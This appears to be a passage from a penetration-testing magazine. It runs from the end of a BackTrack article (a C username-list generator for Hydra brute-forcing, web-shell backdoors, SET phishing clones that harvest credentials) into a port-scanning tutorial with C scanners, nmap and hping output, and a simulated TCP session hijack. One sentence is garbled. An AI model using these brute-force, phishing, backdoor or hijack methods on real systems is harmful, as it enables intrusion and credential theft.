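int detect_convention(const char *first, const char *last, const char *observed) {
    int conv;
    for (conv = 0; conv < CONV_COUNT; conv++)
        if (username_is(conv, first, last, observed))
            return conv;
    return -1;
}

int main(void) {
    /* Constructed sample: one address harvested for a known employee, plus names from LinkedIn. */
    const char *known_first = "John", *known_last = "Smith", *harvested = "smithj";
    const char *others[][2] = { {"Jane", "Doe"}, {"Li", "Wang"}, {"Ana", "Garcia"} };
    char buf[160];
    size_t i;
    int conv = detect_convention(known_first, known_last, harvested);

    if (conv < 0) {
        fprintf(stderr, "no known convention matches %s; try every form instead\n", harvested);
        return 1;
    }
    /* Apply the detected convention to everyone else: this list goes straight to Hydra's -L. */
    for (i = 0; i < sizeof others / sizeof others[0]; i++) {
        make_username(conv, others[i][0], others[i][1], buf, sizeof buf);
        printf("%s\n", buf);
    }
    return 0;
}
```

When no single observed name matches, generate all four forms for every person and let Hydra try them; that costs four times the attempts, which is exactly the factor the text says a known convention saves you.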
Maintaining access: Usually before this phase, a pentester's work is done. The task was to find exploitable holes in the system and draw attention to them for the client to fix. When you start entering the realm of maintaining access to an exploited system, ethics has to guide you. This too shall be disclosed to the client. Adding a backdoor script on a system can allow others to use it for easy exploitation, making you liable.
But, for these backdoor types of access after a hack, BackTrack supplies a number of tools as well. If you have used Metasploit, it can generate a backdoor type of application for a system, allowing Metasploit to find that system every time you test it.
If the web system or site fell under your hacking charms, BackTrack includes a number of web shells for each of the major web development languages. You can upload the selected script via the exploit you have performed, allowing you to quickly and easily access the system back-end the next time you need to without having to go through the entire process of the hack again. Stored user-names and passwords can change, but a backdoor into a system is under your control as long as it is not found and removed by either the administrator or another hacker.
Covering your tracks: Whenever you access a system, there are tools to log your actions. Even if it is just browsing the website, your IP and what you have requested is logged. This is why passive scanning is ideal when trying to find information without arousing suspicion. Active scans can trigger security notifications when care is not taken. These can range from active protection, which will block you immediately, stopping your hack attempts in their tracks, to reactive security measures resulting in legal action and subpoenas being issued for access logs and even the seizing of your equipment. Thus the importance of obtaining that most important document giving you the right to test before doing so.
If all else fails, BackTrack includes social engineering tools as well. The most used of these is SET (the Social-Engineer Toolkit). With this tool, you can make BackTrack act and look like a legitimate website. An unsuspecting user must be lured here by any means necessary, and while not suspecting foul play, will log in, giving you the credentials. The user will then be redirected to the legitimate site, thinking he/she might have typed something wrong.
To do this by hand can take some time. The site and icon need to be replicated, and then hosted on a web server. This site will then have to be altered in such a way as to record the typed-in characters somewhere so you can harvest them. SET allows you to do all this in a few simple steps. It will pull down the site and replicate it to a T, and then update it so that input fields will be harvested by BackTrack and displayed on the screen. It will start a web server on BackTrack as well, without the need for you to go through the effort of web server configuration or page development. And by simply fooling the targeted people into visiting your BackTrack's SET web server, you can harvest the credentials you need to further your attempts to hack the system (Figure 10).
This social engineering method might not be in the spirit of the pentest, and more in the realm of pure hacking, but is a method nonetheless to obtain access to a system. It all depends on your mandate as a pentester.
A final note: BackTrack makes it easy for a pentester to get his/her hands on the required tools to do a good job in finding security exploits on systems. So much so that it also includes pure hacking tools that are outside the realm of testing and fringing on pure hacking. But it also allows the so-called "script kiddies" access to professional tools that are so easy to use that they can exploit systems without understanding what has been achieved.
Thus, use BackTrack as a tool for pentesting. And use it as the tool to test the basics, because others will. But also see BackTrack as only a tool, and understand what you are looking at when investigating a system for security vulnerabilities. It does put you on the right track. And applying what you have seen as results out of BackTrack will put you on the right track to security, or to assisting in the security of an environment. BackTrack is vast, and so is the underlying knowledge that drives the included tools. And only by exercise and the self-motivation to learn and understand can it be of value to you and your client.

Lloyd Wilke

Figure 10. SET Start page with scan types

Lloyd Wilke is the Director of Webstyles Internet Solutions. He is in charge of Webstyles Client Relations and Product Support. Lloyd has launched several successful hosting and backup solutions and a new client website penetration testing division. This has provided a platform for clients to expand their business presence with minimal cost and get maximum exposure.
Webstyles Internet Solutions was started in 2007, offering web hosting as the main service; this has expanded over time to include online backups and website pentesting. WebStyles entered into an agreement with Starship Systems (www.starshipsystems.com) to extend and complete its security offerings to the market. In addition to security services, WebStyles now also offers training and the sharing of knowledge on practical business security.

PENTESTING WITH TOOLS

Network Scanning:
The Basic Tools
Scanning is one of the first steps to obtain information about a network, its services and hosts. While there are numerous tools, most of them fail to fully explain what is going on "under the hood". This article will try to explain the basic techniques used under the hood of great scanners such as nmap.

This will allow the reader to have not only a better understanding of how network scanners work in the discovery phase, but also to be able to implement their own scanners or use other programs to gather this information in case nmap or other tools would trigger IDS signatures and the engagement requires not being caught (Red Team).

A Good Scan is as Good as Half of the
Penetration on the Machine

You sit down and connect to the network, you get
connected and have access, you smile verifying
that all the tools are updated, get the notes ready,
encrypted directory and fire up the nmap scanner.
The client wants a full detailed report and packet
dump for further analysis by their forensic team, so
you turn on tcpdump and let it record. The client
approaches and the conversation goes like this:
• “So how is the engagement going? Any problems?”
• “No sir, no problem, right now I’m just doing a
network discovery scan”
• “What is that?”
• “I’m just looking for ‘live’ hosts and open ports”
• “… explain to me, what is this program doing?
How does it work?”

Scanning is one of the first steps that enables an attacker to obtain valuable information about the network.
Scanning is the most used and most detected part of an attack, since it gives the attacker vital information, such as: which machines are reachable, and which services each machine has turned on or is offering within reach of the attacker.
Scanning is often underrated and not really done properly; scanning is an art and should be treated accordingly. There are basic and advanced techniques, some of which will be covered within this article.
Some introduction to TCP/IP and UDP will be given as background for the techniques covered.

TCP/IP

The Transmission Control Protocol (TCP for short) is a transport protocol (I'm sure the name gave it away); the name TCP/IP refers to an entire suite of data communication protocols, and comes from adding the Transmission Control Protocol to the Internet Protocol.
TCP is a connection-oriented protocol. Whenever a packet arrives, it is checked and an acknowledgement (ACK) referring to that particular packet is sent back to tell the sender that it arrived. Each packet carries a sequence number. The sequence


Listing 1. Basic connecting program written in C for Linux

/*
 * connect-scan.c
 *
 * Fast connect scanner written for demonstration only, this is for educational purposes only
 *
 * Copyright 2003(C) Enrique Alfonso Sanchez Montellano
 * <[email protected]>
 *
 */
#include <stdio.h>
#include <stdlib.h>        /* atoi(), exit() */
#include <string.h>        /* memset(), memcpy() */
#include <unistd.h>        /* close() */
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <getopt.h>

/* Resolve a hostname or dotted quad into a network-order IPv4 address; 0 on failure */
uint32_t resolve (char *serv) {
    struct sockaddr_in sinn;
    struct hostent *hent;

    hent = gethostbyname (serv);
    if(!hent) return 0;
    memset (&sinn, 0, sizeof (sinn));
    memcpy ((char *) &sinn.sin_addr, hent->h_addr, hent->h_length);
    return sinn.sin_addr.s_addr;
}

/* Full TCP connect() to one port; reports whether it is open or closed */
int connect_2_port(uint32_t victim, u_long port) {
    int sockfd;
    struct sockaddr_in hostaddr;

    fprintf(stderr, "Trying port %lu\t\t", port);
    if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        fprintf(stderr, "Cannot allocate socket\n");
        return -1;
    }
    memset(&hostaddr, 0, sizeof(hostaddr));
    hostaddr.sin_port = htons(port);
    hostaddr.sin_addr.s_addr = victim;
    hostaddr.sin_family = AF_INET;
    if((connect(sockfd, (struct sockaddr *)&hostaddr, sizeof(hostaddr))) != 0) {
        fprintf(stderr, "Closed port\n");
    }
    else {
        fprintf(stderr, "Open port\n");
    }
    close(sockfd);
    return 0;
}

void usage(char *name) {
    fprintf(stderr, "Usage: %s -h <host> -s <start port> -e <end port>\n", name);
    fprintf(stderr, "\th: Host to scan\n");
    fprintf(stderr, "\ts: start port (default is 1)\n");
    fprintf(stderr, "\te: end port (default is 6000)\n");
    fprintf(stderr, "Bugs and comments to [email protected]\n\n");
    exit(0);
}

int main(int argc, char **argv) {
    int start_port = 1, end_port = 6000;
    int option, i;
    char *victim = NULL;
    uint32_t resolved_addie;

    if(argc < 2) {
        usage(argv[0]);
    }
    while((option = getopt(argc, argv, "h:s:e:")) != -1) {
        switch(option){
        case 'h':
            victim = optarg;
            break;
        case 's':
            start_port = atoi(optarg);
            if((start_port < 0) || (start_port > 65535)) {
                fprintf(stderr, "Negative or bigger than actual ports detected setting to 1\n");
                start_port = 1;
            }
            break;
        case 'e':
            end_port = atoi(optarg);
            if((end_port < 0) || (end_port > 65535) || (end_port < start_port)) {
                fprintf(stderr, "Weird stuff going on, either end port negative, over 65535 or lower than start port ... setting to port 2\n");
                end_port = 2;
            }
            break;
        }
    }
    if(!victim) {
        usage(argv[0]);
    }
    resolved_addie = resolve(victim);
    if(!resolved_addie) {
        fprintf(stderr, "Cannot resolve %s\n", victim);
        return 1;
    }
    for(i = start_port; i <= end_port; i++) {
        connect_2_port(resolved_addie, i);
    }
    return 0;
}

number is what the host uses to refer to the packet: it tells which connection the packet belongs to and whether it is in order or missing.
An example of a TCP connection is the following: a client (C) sends a synchronize packet to the server (S) to initiate a connection; this packet contains a number to synchronize with (C(syn)). The server then replies with the number the server will use to start the connection and an acknowledgement of the first packet, carrying the number the client sent + 1 (S(syn)/C(ack + 1)). Finally the client sends an acknowledgement packet carrying the number the server sent + 1 (C(S(ack + 1))). This is done to synchronize and keep the numbers straight: if packet 3 arrives before packet 2, the receiver holds packet 3 and keeps acknowledging only what it has so far, and when the sender sees no acknowledgement for packet 2 within its timeout it retransmits it, so that the connection can be reassembled in the right order and complete.
This is called the "3 way handshake". It is a very important process to understand, since some techniques are based on the way TCP handles connections and on how different operating systems have implemented it.
The majority of people I encounter do not realize how dangerous being able to sniff a network is: not only because you can see passwords all over the place, but because you can take over connections. After the connection is set up, the only thing that changes is that the sequence numbers advance with each packet so that packets can be referred to, so when you see packets 1 and 2 pass, you know which number packet 3 will carry. And, if the attacker manages to send packet 3 before the real sender does, it can take over the connection, because the receiver has no way to tell the two apart. When the real packet 3 then arrives, the receiver sees that packet 3 has already been received, takes it for a delay or a repeat, and silently drops it. This only works for an attacker who can see the sequence numbers on the wire, or guess them, which stacks with predictable initial sequence numbers once made easy.
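The handshake and the take-over described above, modelled in C as an added example (this code is not from the article). It keeps only the sequence and acknowledgement numbers and the SYN/ACK flags, which is all the argument needs; the endpoint names, the initial sequence numbers 1000 and 5000 and the FTP-style payloads are constructed sample data. Two things the text states can be checked by running it: that each side ends the handshake expecting the peer's number + 1, and that a forged "packet 3" carrying the predicted sequence number is accepted while the genuine packet 3 is then dropped as a repeat:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* A TCP segment reduced to the fields the discussion needs. */
struct seg {
    const char *from;   /* "C" client, "S" server, "X" attacker */
    uint32_t seq, ack;
    int syn, ackf;      /* SYN and ACK flags */
    const char *data;   /* payload, "" for flag-only segments */
};

/* Per-endpoint sequence state: what we send next, what we expect next. */
struct endpoint { uint32_t snd_nxt, rcv_nxt; };

static struct seg mk(const char *from, uint32_t seq, uint32_t ack,
                     int syn, int ackf, const char *data) {
    struct seg m = { from, seq, ack, syn, ackf, data };
    return m;
}

/*
 * The three-way handshake as the text describes it: C(syn), S(syn)/C(ack + 1),
 * C(S(ack + 1)). Each side chooses its own initial sequence number (ISN).
 * Returns 1 if both sides agree on the numbers, 0 if any step is inconsistent.
 */
int handshake(struct endpoint *c, struct endpoint *s, uint32_t c_isn, uint32_t s_isn) {
    struct seg m;
    c->snd_nxt = c_isn;
    m = mk("C", c->snd_nxt, 0, 1, 0, "");                   /* 1. SYN, seq = C(syn) */
    c->snd_nxt++;                                             /* a SYN occupies one sequence number */
    if (!m.syn) return 0;
    s->rcv_nxt = m.seq + 1;                                   /* server now expects C(syn) + 1 */
    s->snd_nxt = s_isn;
    m = mk("S", s->snd_nxt, s->rcv_nxt, 1, 1, "");            /* 2. SYN/ACK, ack = C(syn) + 1 */
    s->snd_nxt++;
    if (!m.syn || !m.ackf || m.ack != c->snd_nxt) return 0;  /* client: was my SYN acked? */
    c->rcv_nxt = m.seq + 1;                                   /* client now expects S(syn) + 1 */
    m = mk("C", c->snd_nxt, c->rcv_nxt, 0, 1, "");            /* 3. ACK, ack = S(syn) + 1 */
    return m.ackf && m.ack == s->snd_nxt;                     /* server: was my SYN acked? */
}

/* 1 if the handshake leaves each side expecting the peer's ISN + 1. */
int handshake_ok(uint32_t c_isn, uint32_t s_isn) {
    struct endpoint c = {0, 0}, s = {0, 0};
    return handshake(&c, &s, c_isn, s_isn)
        && c.rcv_nxt == s_isn + 1 && s.rcv_nxt == c_isn + 1;
}

/*
 * In-order delivery rule: a data segment is accepted only when its sequence
 * number is exactly rcv_nxt. Anything below is taken for a delayed copy of data
 * already received and dropped silently; anything above would be held until the
 * gap is filled (a real stack queues it; this model refuses it). 1 if accepted.
 */
int deliver(struct endpoint *rx, const struct seg *m, char *inbox, size_t n) {
    if (m->seq != rx->rcv_nxt) return 0;
    strncat(inbox, m->data, n - strlen(inbox) - 1);
    rx->rcv_nxt += (uint32_t)strlen(m->data);
    return 1;
}

/* One data segment from the client, advancing its send pointer. */
static int client_send(struct endpoint *c, struct endpoint *s, const char *data,
                       char *inbox, size_t n) {
    struct seg m = mk("C", c->snd_nxt, c->rcv_nxt, 0, 1, data);
    c->snd_nxt += (uint32_t)strlen(data);
    return deliver(s, &m, inbox, n);
}

/*
 * The take-over from the text. An attacker sniffing the wire sees the client's
 * packets 1 and 2, so it knows the sequence number packet 3 must carry and sends
 * a forged packet 3 first. Returns what the server processed (constructed data);
 * the flags report which packet 3 got in.
 */
const char *hijack_demo(int *forged_accepted, int *legit_accepted) {
    static char inbox[256];
    struct endpoint c = {0, 0}, s = {0, 0};
    struct seg forged;
    inbox[0] = '\0';
    if (!handshake(&c, &s, 1000, 5000)) return "handshake failed";
    client_send(&c, &s, "USER alice\r\n", inbox, sizeof inbox);            /* packet 1, seen on the wire */
    client_send(&c, &s, "PASS hunter2\r\n", inbox, sizeof inbox);          /* packet 2, seen on the wire */
    forged = mk("X", c.snd_nxt, c.rcv_nxt, 0, 1, "DELE payroll.xls\r\n");  /* predicted packet 3 */
    *forged_accepted = deliver(&s, &forged, inbox, sizeof inbox);
    /* the genuine packet 3 now looks like a repeat of data already received */
    *legit_accepted = client_send(&c, &s, "LIST\r\n", inbox, sizeof inbox);
    return inbox;
}

/* 1 if the forged packet was processed and the genuine one dropped. */
int hijack_outcome(void) {
    int forged, legit;
    const char *seen = hijack_demo(&forged, &legit);
    return forged == 1 && legit == 0
        && strstr(seen, "DELE payroll.xls") != NULL && strstr(seen, "LIST") == NULL;
}

int main(void) {
    int forged, legit;
    const char *seen = hijack_demo(&forged, &legit);
    printf("handshake ok: %d\nforged packet 3 accepted: %d, genuine packet 3 accepted: %d\n",
           handshake_ok(1000, 5000), forged, legit);
    printf("server processed:\n%s", seen);
    return 0;
}
```

A real stack also checks the acknowledgement number and window, and the genuine client, now out of step, would eventually reset the connection; the model leaves that out to keep the point visible. Note where the defence lies: random initial sequence numbers stop blind guessing, but only encryption or integrity protection of the data stream (TLS, SSH) stops an attacker who can sniff.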

A lot of things can be done with badly implemented TCP/IP Stacks on operating systems and we
will see some of them on this article.

Types of Scans

Connect Scan

This type of scan requires that the whole 3-way TCP handshake is completed and uses normal sockets; this means you don't need superuser privileges to be able to run this scan, any user can do it. It is usually logged even on the host, due to the fact that you have to complete the whole connection: the application behind the port accepts it and typically records the peer address.
Writing a socket scanner is very easy. We are reinventing the wheel right now, but for the sake of technicality, we are going to write our own fast socket scanner (Listing 1).
The function resolve() calls gethostbyname() and stores the result into a sockaddr_in structure for further use and connections. This is a fairly generic function that can be reused in other programs, so it is a good idea to keep it in a separate C file in case of multiple projects, or, in a bigger project, by design, to be able to maintain it. But our scanner is fairly small, and for readability we keep it within our code (Listing 2). In new code, prefer getaddrinfo(), which also handles IPv6; gethostbyname() is kept here because it is what the listing uses.
Next, the function connect_2_port() does the actual connection. This is done by taking the result of the resolve function and the port, creating a socket, and filling in the correct information (Listing 3).
As you can see, writing a fast scanner based on sockets and pure connection is easy. You can also use "canned tools" such as nmap (a great scanner and the industry standard): Listing 4.
As the reader can see, nmap gathers and shows more information than our scanner. If you want to add the service names you can parse the /etc/services file and add them, but if you are writing your own
Listing 2. Function to resolve into a sockaddr_in structure the IP Address or hostname given

uint32_t resolve (char *serv) {
    struct sockaddr_in sinn;    // structure to fill out with the result of gethostbyname()
    struct hostent *hent;

    hent = gethostbyname (serv);        // We execute gethostbyname()
    if(!hent) return 0;                 // If we could not resolve we return 0
    bzero ((char *) &sinn, sizeof (sinn));
    memcpy ((char *) &sinn.sin_addr, hent->h_addr, hent->h_length);
    return sinn.sin_addr.s_addr;        // Else we return the resolved address as an unsigned int
}

StartKit 01/2013(01)

Page 35

http://pentestmag.com

PENTESTING WITH TOOLS
scanner, you probably know a couple of most used
ports don’t you? This type of scan as it was said
before, is usually really dirty and even the host
logs it sometimes (in the case of using wrappers)
so expect your IDS to go bananas as soon as you
run the port scanners with this option.

SYN Scan

In this type of scan the connection is never completed: instead of sending the last part of the three-way handshake, a RST is sent. That is, a SYN goes out, a SYN/ACK comes back, and then a RST is sent instead of the ACK.
This type of port scan is not logged by the host (unless you have a host-based IDS, in which case it is the IDS doing the logging, not the host). It used to get logged on 2.0.x kernels because of a bug that made the kernel accept the half-open connection too early, but the bug was fixed, so it no longer gets logged.

Listing 3. connect_2_port function
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int connect_2_port(uint32_t victim, u_long port) {
    int sockfd;
    struct sockaddr_in hostaddr;
    fprintf(stderr, "Trying port %lu\t\t", port);
    if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {  // Create socket
        fprintf(stderr, "Cannot allocate socket\n");
        return -1;
    }
    memset(&hostaddr, 0, sizeof(hostaddr));  // zero the structure so sin_zero/padding is clean
    hostaddr.sin_family = AF_INET;
    hostaddr.sin_port = htons(port);         // Fill out the port we are going to connect to
    hostaddr.sin_addr.s_addr = victim;       // Fill out the address we are going to connect to (from resolve())
    if (connect(sockfd, (struct sockaddr *)&hostaddr, sizeof(hostaddr)) != 0) {
        fprintf(stderr, "Closed port\n");    // RST (ECONNREFUSED) or timeout: treated as closed
    } else {
        fprintf(stderr, "Open port\n");      // full three-way handshake completed
    }
    close(sockfd);
    return 0;
}

Listing 4. nmap output for a full connect scan
nahual@fscking:~$ nmap -sT -n 127.0.0.1    //We are going to scan ourselves to make it fast
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (127.0.0.1):
(The 1599 ports scanned but not shown below are in state: closed)
Port       State       Service
22/tcp     open        ssh
111/tcp    open        sunrpc
Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds
nahual@fscking:~$


This is one of the most widely used methods of scanning. It is faster than the full connect scan, since you do not have to wait for the connection to complete to know that the port is open: as soon as you get a SYN/ACK you know the port is open and add it to the list of open ports. You can use nmap; in this case you use the -sS option instead of -sT: Listing 5.

What happened? This type of scan requires root, since you have to open raw sockets to be able to tear the connection down differently, or simply never complete it, by crafting the packets yourself instead of letting the kernel fill in most of the fields.
I wouldn't recommend making nmap setuid root, since it could have bugs that could be exploited (in older versions, if nmap was setuid you could just run nmap --interactive and then !/bin/sh your way to root), so su or sudo to root and try the scan again: Listing 6.
By now you must be wondering why I'm using the -n option without saying anything about it. The -n option tells the program not to resolve the IP address or name (as odd as it sounds) when printing it, meaning it will not resolve localhost to 127.0.0.1 and then try to resolve 127.0.0.1 back to a name to print it. That would take more time, and we are not going to waste any on it!
But using canned tools without knowing how they work underneath is not that good, it is not fun, and in complex scenarios it might even get you in trouble. We are going to use one of my favorite tools: hping.
Hping is written by Salvatore Sanfilippo (antirez); you can find it at http://www.kyuzz.org/antirez/hping2.html or just apt-get install it on a Debian based distribution (Kali, formerly known as BackTrack, already contains hping). This tool lets us craft packets with whatever options we wish without having to code an entire packet generator ourselves, so we will port scan the same machine with hping. To run hping you need to be root, and you need to read up on some of the options. It is not as "clean" as nmap, which gives you everything already processed: hping creates packets, sends them and shows you the response, so the interpretation is left to the user. It is more flexible, and you can read the results for yourself. Some options will be discussed here and some won't; check the man page for more details.
Hping can take a huge number of options; the most important ones for us are:
• -S: set the SYN flag in the TCP packet
• -A: set the ACK flag in the TCP packet
• -r: print the IP ID of each reply relative to the previous one (the increment) instead of the absolute value
• -a: spoof the source address; the address written right after the option is used as if the packet was sent from it
• -p: destination port for the packet (++ increments the port for each packet sent)
• -i: interval between packets (with a u prefix the value is in microseconds, e.g. -i u1000)
Now let's see how a closed port looks in hping: Listing 7.

Listing 5. Nmap execution of a SYN scan without root privileges
nahual@fscking:~$ nmap -sS -n 127.0.0.1
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
You requested a scan type which requires r00t privileges, and you do not have them.
QUITTING!
nahual@fscking:~$

Listing 6. Nmap output of a SYN scan
nahual@fscking:~$ su
Password: //Type root's password here
If there was in justice in the world, "trust" would be a four-letter word.
root@fscking:~# nmap -sS -n 127.0.0.1
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (127.0.0.1):
(The 1599 ports scanned but not shown below are in state: closed)
Port       State       Service
22/tcp     open        ssh
111/tcp    open        sunrpc
Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
root@fscking:~#

Listing 7. hping sending SYN packets to a closed port
root@fscking:~# hping -S -p 130 127.0.0.1
HPING 127.0.0.1 (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=0 win=0 rtt=0.5 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=1 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=2 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=130 flags=RA seq=3 win=0 rtt=0.2 ms

--- 127.0.0.1 hping statistic ---
4 packets tramitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.3/0.5 ms
root@fscking:~#

Listing 8. hping sending SYN packets to an open port
root@fscking:~# hping -S -p 22 127.0.0.1
HPING 127.0.0.1 (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=0 win=32767 rtt=1.7 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=1 win=32767 rtt=0.3 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=2 win=32767 rtt=0.3 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=3 win=32767 rtt=0.2 ms

--- 127.0.0.1 hping statistic ---
4 packets tramitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.2/0.6/1.7 ms
root@fscking:~#

Listing 9. hping sending one packet to each port and incrementing the port after each packet
root@fscking:~# hping -S -p ++ 127.0.0.1
HPING 127.0.0.1 (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=0 win=0 rtt=0.4 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=1 flags=RA seq=1 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=2 flags=RA seq=2 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=3 flags=RA seq=3 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=4 flags=RA seq=4 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=5 flags=RA seq=5 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=6 flags=RA seq=6 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=7 flags=RA seq=7 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=8 flags=RA seq=8 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=9 flags=RA seq=9 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=10 flags=RA seq=10 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=11 flags=RA seq=11 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=12 flags=RA seq=12 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=13 flags=RA seq=13 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=14 flags=RA seq=14 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=15 flags=RA seq=15 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=16 flags=RA seq=16 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=17 flags=RA seq=17 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=18 flags=RA seq=18 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=19 flags=RA seq=19 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=20 flags=RA seq=20 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=21 flags=RA seq=21 win=0 rtt=0.1 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=22 win=32767 rtt=0.7 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=23 flags=RA seq=23 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=24 flags=RA seq=24 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=25 flags=RA seq=25 win=0 rtt=0.2 ms
--- 127.0.0.1 hping statistic ---
26 packets tramitted, 26 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.2/0.7 ms
root@fscking:~#

Listing 10. hping sending SYN packets to every port, with grep to keep only the open ones
root@fscking:~# hping -S -p ++ 127.0.0.1 -i u1000 | grep SA
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=22 win=32767 rtt=0.2 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=111 flags=SA seq=111 win=32767 rtt=0.1 ms
--- 127.0.0.1 hping statistic ---
810 packets tramitted, 810 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.7 ms
root@fscking:~#

Listing 11. nmap executing a FIN scan
root@fscking:~# nmap -sF -n 127.0.0.1
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (127.0.0.1):
(The 1599 ports scanned but not shown below are in state: closed)
Port       State       Service
22/tcp     open        ssh
111/tcp    open        sunrpc
Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
root@fscking:~#

If we read along the line and look at flags, we get the flags set in the returned packet: RA, R for RST and A for ACK. This means the server got our SYN (hence the ACK) but the port is closed (it is not offering any service), since the R flag is on. Another nice indication is that the window size is 0, saying you cannot send any data on that port (since it is closed, of course!).
If the port is open the result looks like Listing 8.
The reader can see how the flags have changed from RA to SA, S for SYN and A for ACK, meaning the port is open; the window size is also different from 0, meaning you can send data through that port. But running one command per port and reading everything can be trying; how can I send to every port? We use the -p option with ++: Listing 9.
We can see that sport gives us the port on the server that answered. We can also see that all ports apart from 22 are closed, since 22 is the only one with SA and a window size different from 0.
To make it faster and easier to read we can use grep and the -i option: Listing 10.
We sent 810 packets but used grep to print only the lines with the SA flags, meaning only the open ports, and we get the same result as the other scans: ports 22 and 111 are open.

Listing 12. hping used to execute a FIN scan
root@fscking:~# hping -F 127.0.0.1 -p ++
HPING 127.0.0.1 (lo 127.0.0.1): F set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=0 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=1 flags=RA seq=1 win=0 rtt=0.4 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=2 flags=RA seq=2 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=3 flags=RA seq=3 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=4 flags=RA seq=4 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=5 flags=RA seq=5 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=6 flags=RA seq=6 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=7 flags=RA seq=7 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=8 flags=RA seq=8 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=9 flags=RA seq=9 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=10 flags=RA seq=10 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=11 flags=RA seq=11 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=12 flags=RA seq=12 win=0 rtt=0.4 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=13 flags=RA seq=13 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=14 flags=RA seq=14 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=15 flags=RA seq=15 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=16 flags=RA seq=16 win=0 rtt=0.2 ms
